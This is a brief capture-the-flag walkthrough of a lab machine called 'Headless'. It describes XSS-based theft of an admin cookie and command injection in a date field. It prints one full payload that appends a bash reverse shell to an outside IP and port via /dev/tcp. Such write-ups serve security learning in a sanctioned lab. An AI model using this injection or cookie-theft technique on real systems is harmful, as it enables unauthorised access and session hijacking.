Headless

Recon

nmap_scan.log

HTTP (5000)

It's a python server and we have a submit form on /support, ``

It's said that we are reported to admins and they will review it, the SSTI didn't work but it did trigger the alarm.

Writeup.png

After testing for XSS we are able to inject and since admin will look at our report we could steal a cookie:

Writeup-1.png

Let's assign ourselves the cookie so we can access the /dashboard:

Writeup-2.png

We have a command injection:

Writeup-3.png

Get a reverse connection: date=2023-09-15;bash+-c+'exec+bash+-i+%26>/dev/tcp/10.10.16.74/4444+<%261'%3b

User.txt

Root.txt

Last updated